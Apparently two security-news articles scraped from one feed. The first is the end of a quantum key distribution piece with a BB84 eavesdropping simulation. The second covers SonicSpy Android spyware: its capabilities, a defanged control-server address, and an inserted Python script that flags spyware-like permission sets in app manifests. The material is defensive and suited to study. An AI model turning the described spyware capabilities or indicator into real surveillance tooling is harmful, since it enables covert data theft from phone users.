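    for i, eve_present in enumerate(eve_schedule):
        _, qber = bb84_round(n_photons, eve_present, seed=seed + i)
        outcomes.append("abort" if qber > threshold else "key")
    return outcomes


if __name__ == "__main__":
    print("no eavesdropper:", bb84_round(4000, False))
    print("intercept-resend:", bb84_round(4000, True))
    print("persistent Eve:", session_outcomes(1000, [True] * 5))
```

Without Eve the sifted key matches exactly; with intercept-and-resend she picks the wrong basis half the time and then hands Bob a random bit, so roughly a quarter of the sifted bits disagree, far above any sane abort threshold. Note what the model does not cover: the equipment-side weaknesses the NCSC paper describes are attacks on the detectors and sources, not on the photons, and they do not show up as errors at all.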

There is now talk of a large-scale global QKD system. This remains far-fetched, as does the idea of a “quantum internet”. As far as we know, QKD has not even been used to confirm a real-world hack, although it’s not impossible as militaries have been testing the technology for a while.

QKD, and China’s satellite experiments, will doubtless prove their worth one day, in some form. Until that day, expect more silly headlines that present well-established quantum principles as if they were the opening to Alice’s rabbit hole.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/hBqPS0bUHe4/

Thousands of Android-spying apps in the wild: what to do about SonicSpy

Thanks to Chen Yu, Rowland Yu and Ferenc László Nagy of SophosLabs for their behind-the-scenes work.

Android users have a new threat to be aware of: spyware apps that steal data from the devices they infect. Some samples made their way to Google Play, but the vast majority are coming from other online sources.

Researchers from SophosLabs and elsewhere have found three cases of SonicSpy-infused apps in Google Play: Soniac, Hulk Messenger, and Troy Chat – messaging apps that hide their spying functionality and await orders from command-and-control servers.

Google booted the apps from its store after they were discovered. Researcher Chen Yu said the Google Play versions had “tiny installation numbers and existed for a very short time”. Though three were found on Google Play, SophosLabs has counted 3,240 SonicSpy apps in the wild. Some reports place the number at 4,000.

According to multiple reports, a single bad actor – probably based in Iraq – has released these apps into the wild since February.

How it operates

The various SonicSpy-infused apps share the ability to:

  • Silently record audio
  • Take photos with the device’s camera
  • Make outbound calls
  • Send text messages to whatever phone numbers the attacker chooses
  • Retrieve data from contacts, Wi-Fi hotspots and call logs

On the devices it infects, SonicSpy removes its launch icon to hide itself. It then connects to a control server on port 2222 of arshad93.ddns[.]net, according to Michael Flossman, a researcher from Lookout who first reported the spyware’s appearance.
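Every capability in the list above has to be declared in the app’s AndroidManifest.xml before the platform will grant it, so a decoded manifest is enough to triage a suspicious messaging app without running it. The following is an added example, not SophosLabs or Lookout code, that maps the SonicSpy capability list to the permissions that grant it, counts how many an app requests alongside INTERNET (which it needs to reach a control server), and lists the launcher activities, the ones a SonicSpy-style app would later disable to hide its icon. The manifests are constructed; the cut-off of four capabilities is an assumption of the example.

```python
"""Triage a decoded AndroidManifest.xml for the permission profile of a
SonicSpy-style spyware app.  Added example, not vendor code."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"

# The capability list reported for SonicSpy, mapped to the permissions an app
# must declare to have it.
CAPABILITIES = {
    "record audio": {"android.permission.RECORD_AUDIO"},
    "take photos": {"android.permission.CAMERA"},
    "make calls": {"android.permission.CALL_PHONE"},
    "send SMS": {"android.permission.SEND_SMS"},
    "read contacts": {"android.permission.READ_CONTACTS"},
    "read Wi-Fi info": {"android.permission.ACCESS_WIFI_STATE"},
    "read call log": {"android.permission.READ_CALL_LOG"},
}
SPYWARE_CUTOFF = 4  # assumed: this many capabilities plus INTERNET is suspicious


def _is_launcher(activity):
    """True if the activity has a MAIN/LAUNCHER intent filter (it owns a home-screen icon)."""
    for intent_filter in activity.iter("intent-filter"):
        actions = {a.get(NAME) for a in intent_filter.iter("action")}
        categories = {c.get(NAME) for c in intent_filter.iter("category")}
        if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in categories:
            return True
    return False


def assess_manifest(xml_text):
    """Return package name, matched capabilities, launcher activities and a verdict."""
    root = ET.fromstring(xml_text)
    perms = {p.get(NAME) for p in root.iter("uses-permission")}
    caps = sorted(cap for cap, needed in CAPABILITIES.items() if needed & perms)
    launchers = [a.get(NAME) for a in root.iter("activity") if _is_launcher(a)]
    suspicious = len(caps) >= SPYWARE_CUTOFF and "android.permission.INTERNET" in perms
    return {
        "package": root.get("package"),
        "capabilities": caps,
        "launchers": launchers,
        "verdict": "spyware-like" if suspicious else "review",
    }


# Constructed manifest resembling a chat app with the full SonicSpy permission set.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.chat">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <application android:label="Chat">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService"/>
  </application>
</manifest>
"""

# Constructed manifest for a chat app that only needs the network.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.plainchat">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Plain Chat">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

if __name__ == "__main__":
    print(assess_manifest(SAMPLE_MANIFEST))
    print(assess_manifest(BENIGN_MANIFEST))
```

A manifest check cannot see the icon being hidden, because that happens at runtime by disabling the launcher component, nor the connection to port 2222 on the control server; the permission profile is the static tell, and a messaging app that asks for the camera, call log, outbound calls and SMS together is one to pull apart further or simply not install.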

Defensive measures

Sophos customers are protected from the SonicSpy apps, which are detected as Andr/HiddenAp-W, Andr/Axent-CY, Andr/FakeApp-BK and Andr/Xgen-Y.

The continued presence of malicious Android apps demonstrates the need to use an Android antivirus such as our free Sophos Mobile Security for Android.

By blocking the install of malicious and unwanted apps, even if they come from Google Play, you can spare yourself lots of trouble.

In the bigger picture, the average Android user isn’t going to know what techniques the malware used to reach their device’s doorstep, but they can do much to keep it from getting in – especially when it comes to the apps they choose. To that end, here’s some more general advice:

  • Stick to Google Play. It isn’t perfect, but Google does put plenty of effort into preventing malware arriving in the first place, or purging it from the Play Store if it shows up. In contrast, many alternative markets are little more than a free-for-all where app creators can upload anything they want, and frequently do.
  • Avoid apps with a low reputation. If no one knows anything about a new app yet, don’t install it on a work phone, because your IT department won’t thank you if something goes wrong.
  • Patch early, patch often. When buying a new phone model, check the vendor’s attitude to updates and the speed that patches arrive. Why not put “faster, more effective patching” on your list of desirable features, alongside or ahead of hardware advances such as “better camera” and “higher-res screen”?

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qWUpmKNH8F8/